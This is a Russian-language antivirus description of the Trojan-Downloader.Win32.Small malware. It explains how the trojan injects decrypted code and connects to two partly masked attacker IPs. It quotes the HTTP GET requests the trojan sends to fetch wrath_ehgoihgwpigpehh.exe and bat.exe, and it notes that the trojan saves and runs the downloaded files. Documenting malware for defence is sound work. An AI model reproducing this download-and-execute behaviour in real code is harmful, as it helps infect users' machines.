Trojan-Downloader.Win32.Small

После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как «Trojan-Downloader.Win32.Agent.cngp»). Внедренный код выполняет следующие действия:

• устанавливает соединение с хостами:

  
  
  
  188.***.161
  
  
  
  85.***.111
  
  
  
  

• В случае успешного подключения, на указанные сервера отправляются HTTP-запросы:

  
  
  
  GET /wrath_ehgoihgwpigpehh.exe HTTP/1.0
  
  
  
  Host: 188.***.161
  
  
  
  
  
  
  
  GET /bat.exe HTTP/1.0
  
  
  
  Host: 188.***.161
  
  
  
  
  
  
  
  GET /wrath_ehgoihgwpigpehh.exe HTTP/1.0
  
  
  
  Host: 85.***.111
  
  
  
  
  
  
  
  GET /bat.exe HTTP/1.0
  
  
  
  Host: 85.***.111
  
  
  
  

• В ответ на посланный запрос сервер злоумышленника отправляет поток зашифрованных данных, которые расшифровываются троянцем и записываются в файлы:

  %WinDir%Temp_ex-.exe

  где – случайные двухзначные десятичные числа.

  На момент создания описания файлы не загружались.

• Запускает на выполнение загруженные файлы.